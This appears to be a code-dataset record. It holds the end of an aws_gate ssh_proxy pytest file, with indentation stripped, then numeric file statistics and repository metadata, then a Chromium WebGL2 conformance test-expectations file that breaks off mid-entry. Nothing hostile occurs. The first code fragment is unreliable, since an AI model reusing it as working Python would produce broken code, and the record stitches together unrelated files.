mocker.patch("aws_gate.decorators.is_existing_profile", return_value=True)
mocker.patch("aws_gate.decorators.is_existing_region", return_value=True)
with pytest.raises(ValueError):
ssh_proxy(
config=config,
instance_name=instance_id,
profile_name="default",
region_name="eu-west-1",
)
def test_ssh_proxy_without_config(mocker, ssh_key, instance_id, empty_config):
mocker.patch("aws_gate.ssh_proxy.get_aws_client")
mocker.patch("aws_gate.ssh_proxy.get_aws_resource")
mocker.patch("aws_gate.ssh_proxy.query_instance", return_value=None)
mocker.patch("aws_gate.ssh_proxy.SshKey", return_value=ssh_key)
mocker.patch("aws_gate.decorators._plugin_exists", return_value=True)
mocker.patch("aws_gate.decorators.execute_plugin", return_value="1.1.23.0")
with pytest.raises(ValueError):
ssh_proxy(
config=empty_config,
instance_name=instance_id,
profile_name="default",
region_name="eu-west-1",
)
| 37.927007
| 87
| 0.739992
| 718
| 5,196
| 4.980501
| 0.094708
| 0.0783
| 0.152685
| 0.196309
| 0.864933
| 0.842562
| 0.777405
| 0.763143
| 0.700224
| 0.687081
| 0
| 0.006585
| 0.152425
| 5,196
| 136
| 88
| 38.205882
| 0.805404
| 0
| 0
| 0.660377
| 0
| 0
| 0.278291
| 0.25154
| 0
| 0
| 0
| 0
| 0.056604
| 1
| 0.084906
| false
| 0.009434
| 0.018868
| 0
| 0.103774
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97e626c62b6e43f607c4d64a05a7555888c680a0
| 55,888
|
py
|
Python
|
src/content/test/gpu/gpu_tests/webgl2_conformance_expectations.py
|
yang-guangliang/osv-free
|
b81fee48bc8898fdc641a2e3c227957ed7e6445e
|
[
"Apache-2.0"
] | 2
|
2021-05-24T13:52:28.000Z
|
2021-05-24T13:53:10.000Z
|
src/content/test/gpu/gpu_tests/webgl2_conformance_expectations.py
|
yang-guangliang/osv-free
|
b81fee48bc8898fdc641a2e3c227957ed7e6445e
|
[
"Apache-2.0"
] | null | null | null |
src/content/test/gpu/gpu_tests/webgl2_conformance_expectations.py
|
yang-guangliang/osv-free
|
b81fee48bc8898fdc641a2e3c227957ed7e6445e
|
[
"Apache-2.0"
] | 3
|
2018-03-12T07:58:10.000Z
|
2019-08-31T04:53:58.000Z
|
# Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from gpu_tests.webgl_conformance_expectations import WebGLConformanceExpectations
# See the GpuTestExpectations class for documentation.
class WebGL2ConformanceExpectations(WebGLConformanceExpectations):
def __init__(self, conformance_path, url_prefixes=None, is_asan=False):
super(WebGL2ConformanceExpectations, self).__init__(
conformance_path, url_prefixes=url_prefixes, is_asan=is_asan)
def SetExpectations(self):
# ===================================
# Extension availability expectations
# ===================================
# It's expected that not all extensions will be available on all platforms.
# Having a test listed here is not necessarily a problem.
# Skip these, rather than expect them to fail, to speed up test
# execution. The browser is restarted even after expected test
# failures.
self.Skip('WebglExtension_WEBGL_compressed_texture_astc',
['win', 'mac', 'linux'])
self.Skip('WebglExtension_WEBGL_compressed_texture_atc',
['win', 'mac', 'linux'])
self.Skip('WebglExtension_WEBGL_compressed_texture_etc',
['win', 'mac', 'linux'])
self.Skip('WebglExtension_WEBGL_compressed_texture_etc1',
['win', 'mac', 'linux'])
self.Skip('WebglExtension_WEBGL_compressed_texture_pvrtc',
['win', 'mac', 'linux'])
self.Skip('WebglExtension_WEBGL_compressed_texture_s3tc_srgb',
['win', 'mac', 'linux'])
# ========================
# Conformance expectations
# ========================
# Too slow (take about one hour to run)
self.Skip('deqp/functional/gles3/builtinprecision/*.html', bug=619403)
# All platforms.
self.Flaky('conformance2/query/occlusion-query.html', bug=603168)
self.Fail('conformance2/glsl3/tricky-loop-conditions.html', bug=483282)
self.Fail('conformance2/rendering/depth-stencil-feedback-loop.html',
bug=660844) # WebGL 2.0.1
self.Fail('conformance2/rendering/rendering-sampling-feedback-loop.html',
bug=660844) # WebGL 2.0.1
self.Fail('conformance2/textures/misc/' +
'integer-cubemap-specification-order-bug.html',
bug=483282) # owner:cwallez, test might be buggy
self.Fail('conformance/textures/misc/tex-sub-image-2d-bad-args.html',
bug=625738)
self.Fail('conformance/glsl/misc/uninitialized-local-global-variables.html',
bug=1966) # angle bug ID
self.Fail('conformance2/glsl3/uninitialized-local-global-variables.html',
bug=1966) # angle bug ID
# Windows only.
self.Fail('conformance2/rendering/blitframebuffer-outside-readbuffer.html',
['win', 'd3d11'], bug=644740)
self.Fail('conformance2/textures/misc/tex-base-level-bug.html',
['win', 'd3d11'], bug=705865)
# Win / NVidia
self.Flaky('deqp/functional/gles3/fbomultisample*',
['win', 'nvidia', 'd3d11'], bug=631317)
self.Fail('conformance2/rendering/' +
'draw-with-integer-texture-base-level.html',
['win', 'nvidia', 'd3d11'], bug=679639)
# Win10 / NVIDIA Quadro P400 / D3D11 flaky failures
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_interleaved_lines.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_interleaved_triangles.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_separate_lines.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_separate_triangles.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_interleaved_lines.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_interleaved_triangles.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_separate_lines.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_separate_triangles.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/interpolation_flat.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Flaky('conformance/textures/image_bitmap_from_video/' +
'tex-2d-rgba-rgba-unsigned_short_5_5_5_1.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=728670)
self.Flaky('conformance/textures/image_bitmap_from_video/' +
'tex-2d-rgba-rgba-unsigned_short_4_4_4_4.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=728670)
self.Flaky('conformance2/textures/video/*',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=728670)
self.Flaky('conformance2/textures/image_bitmap_from_video/*',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=728670)
self.Flaky('conformance/extensions/oes-texture-half-float-with-video.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=728670)
# Win / NVIDIA / OpenGL
self.Fail('conformance2/glsl3/vector-dynamic-indexing-nv-driver-bug.html',
['win', 'nvidia', 'opengl'], bug=693090)
self.Fail('conformance2/glsl3/' +
'vector-dynamic-indexing-swizzled-lvalue.html',
['win', 'nvidia', 'opengl'], bug=709874)
# Win / AMD
self.Fail('conformance2/rendering/blitframebuffer-stencil-only.html',
['win', 'amd', 'd3d11'], bug=483282) # owner:jmadill
# Keep a separate set of failures for the R7 240, since it can use a new
# and updated driver. The older drivers won't ever get fixes from AMD.
# Use ['win', ('amd', 0x6613)] for the R7 240 devices.
# Have seen this time out. Think it may be because it's currently
# the first test that runs in the shard, and the browser might not
# be coming up correctly.
self.Flaky('deqp/functional/gles3/multisample.html',
['win', ('amd', 0x6613)], bug=687374)
# Win / Intel
self.Fail('conformance2/glsl3/' +
'texture-offset-uniform-texture-coordinate.html',
['win', 'intel', 'd3d11'], bug=662644) # WebGL 2.0.1
self.Skip('conformance2/textures/misc/copy-texture-image.html',
['win', 'intel', 'd3d11'], bug=617449)
# Seems to cause the harness to fail immediately afterward
self.Skip('conformance2/textures/video/tex-2d-rgba16f-rgba-half_float.html',
['win', 'intel', 'd3d11'], bug=648337)
self.Flaky('deqp/functional/gles3/lifetime.html',
['win', 'intel', 'd3d11'], bug=620379)
self.Skip('deqp/functional/gles3/texturespecification/' +
'teximage3d_depth_pbo.html',
['win', 'intel', 'd3d11'], bug=617449)
self.Flaky('deqp/functional/gles3/textureformat/unsized_3d.html',
['win', 'intel', 'd3d11'], bug=614418)
# These tests seem to crash flakily. It's best to leave them as skip
# until we can run them without GPU hangs and crashes.
self.Skip('deqp/functional/gles3/textureshadow/2d_array_*.html',
['win', 'intel', 'd3d11'], bug=666392)
# Win 10 / Intel
self.Fail('deqp/functional/gles3/fbocolorbuffer/clear.html',
['win10', 'intel', 'd3d11', 'no_passthrough'], bug=483282)
# Intel HD 530
self.Fail('conformance2/textures/misc/angle-stuck-depth-textures.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/fboinvalidate/format_00.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/fboinvalidate/format_01.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/fboinvalidate/format_02.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_03.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_04.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_06.html',
['win', 'intel', 'd3d11'], bug=680797)
# It's unfortunate that these suppressions need to be so broad, but it
# looks like the D3D11 device can be lost spontaneously on this
# configuration while running basically any test.
self.Flaky('conformance/*', ['win', 'intel', 'd3d11'], bug=628395)
self.Flaky('conformance2/*', ['win', 'intel', 'd3d11'], bug=628395)
self.Flaky('deqp/*', ['win', 'intel', 'd3d11'], bug=628395)
# Passthrough command decoder / D3D11
self.Fail('conformance/textures/image_bitmap_from_video/*',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/textures/video/*',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/textures/misc/texture-corner-case-videos.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_video/*',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/video/*',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/glsl3/no-attribute-vertex-shader.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/rendering/clearbuffer-sub-source.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/tex-2d-rg8-rg-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/tex-2d-rg16f-rg-half_float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/tex-2d-rg16f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/tex-2d-rg32f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg8-rg-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg16f-rg-half_float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg16f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg32f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg8-rg-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg16f-rg-half_float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg16f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg32f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rg8-rg-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rg16f-rg-half_float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rg16f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rg32f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-srgb8-rgb-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-srgb8_alpha8-rgba-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/glsl/misc/shaders-with-name-conflicts.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/data/gles3/shaders/preprocessor.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/reading/read-pixels-from-fbo-test.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Skip('conformance2/textures/misc/' +
'copy-texture-image-webgl-specific.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Skip('conformance2/reading/read-pixels-pack-parameters.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Skip('conformance2/reading/read-pixels-into-pixel-pack-buffer.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/reading/format-r11f-g11f-b10f.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/misc/' +
'tex-image-with-bad-args-from-dom-elements.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/misc/uninitialized-test.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/reading/read-pixels-test.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/textures/misc/copy-tex-image-and-sub-image-2d.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/fbocolorbuffer/clear.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/fboinvalidate/sub.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/shaderbuiltinvar.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_*.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/instancedrendering.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/integerstatequery.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/readpixel.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/shaderderivate_dfdx.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/shaderderivate_dfdy.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/shaderderivate_fwidth.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/shaderstruct.html',
['win', 'passthrough', 'd3d11'], bug=602688)
# Mac only.
# Regressions in 10.12.4.
self.Fail('conformance2/textures/misc/tex-base-level-bug.html',
['sierra'], bug=705865)
self.Fail('conformance2/textures/misc/tex-mipmap-levels.html',
['sierra'], bug=705865)
# Fails on multiple GPU types.
self.Fail('conformance2/glsl3/vector-dynamic-indexing-swizzled-lvalue.html',
['mac'], bug=709351)
self.Fail('conformance2/rendering/' +
'framebuffer-completeness-unaffected.html',
['mac', 'nvidia', 'intel'], bug=630800)
self.Fail('deqp/functional/gles3/fbocompleteness.html',
['mac', 'nvidia', 'intel'], bug=630800)
# Mac Retina NVIDIA
self.Fail('deqp/functional/gles3/fbomultisample*',
['mac', ('nvidia', 0xfe9)], bug=641209)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_04.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('conformance/attribs/gl-disabled-vertex-attrib.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Flaky(
'conformance/extensions/webgl-compressed-texture-size-limit.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('conformance/programs/' +
'gl-bind-attrib-location-long-names-test.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('conformance/programs/gl-bind-attrib-location-test.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('conformance2/glsl3/loops-with-side-effects.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('conformance2/textures/misc/tex-input-validation.html',
['mac', ('nvidia', 0xfe9), 'no_angle'], bug=483282)
self.Flaky('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba16f-rgba-half_float.html',
['mac', ('nvidia', 0xfe9)], bug=682834)
self.Fail('deqp/functional/gles3/draw/random.html',
['sierra', ('nvidia', 0xfe9)], bug=716652)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_04.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_07.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_08.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_10.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_11.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_12.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_13.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_18.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_25.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_29.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_32.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_34.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/pixelbufferobject.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/negativevertexarrayapi.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/shaderindexing/varying.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_2d_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_2d_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_2d_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_2d_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_cube_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_cube_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_cube_02.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_cube_03.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_cube_04.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage3d_pbo_2d_array_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage3d_pbo_2d_array_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage3d_pbo_3d_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage3d_pbo_3d_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage3d_pbo_3d_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage3d_pbo_3d_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/fragmentoutput/array.fixed.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fragmentoutput/basic.fixed.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fragmentoutput/random_00.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fragmentoutput/random_01.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fragmentoutput/random_02.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/clear.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/tex2d_05.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/tex2darray_05.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/tex3d_05.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/texcube_05.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/blend.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/draw/draw_arrays.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/draw/draw_arrays_instanced.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/draw/draw_elements.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/draw/draw_elements_instanced.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/draw/draw_range_elements.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fboinvalidate/format_02.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/negativeshaderapi.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Flaky('deqp/functional/gles3/vertexarrays/' +
'multiple_attributes.output.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_28.html',
['mac', ('nvidia', 0xfe9)], bug=654187)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_30.html',
['mac', ('nvidia', 0xfe9)], bug=654187)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_31.html',
['mac', ('nvidia', 0xfe9)], bug=654187)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_33.html',
['mac', ('nvidia', 0xfe9)], bug=654187)
# Mac AMD
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_interleaved_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_interleaved_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_interleaved_triangles.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_separate_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_separate_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_separate_triangles.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_interleaved_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_interleaved_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_interleaved_triangles.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_separate_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_separate_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_separate_triangles.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'interpolation_centroid.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'interpolation_flat.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'interpolation_smooth.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'point_size.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'position.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_interleaved_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_interleaved_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_interleaved_triangles.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_separate_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_separate_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_separate_triangles.html',
['mac', 'amd'], bug=483282)
self.Flaky('deqp/functional/gles3/shaderoperator/common_functions.html',
['mac', 'amd'], bug=702336)
self.Flaky('deqp/functional/gles3/shaderindexing/mat_01.html',
['mac', 'amd'], bug=636648)
self.Flaky('deqp/functional/gles3/shaderindexing/mat_02.html',
['mac', 'amd'], bug=644360)
# These seem to be provoking intermittent GPU process crashes on
# the MacBook Pros with AMD GPUs.
self.Flaky('deqp/functional/gles3/texturefiltering/*',
['mac', 'amd'], bug=663601)
self.Flaky('deqp/functional/gles3/textureshadow/*',
['mac', 'amd'], bug=663601)
self.Flaky('deqp/functional/gles3/texturespecification/' +
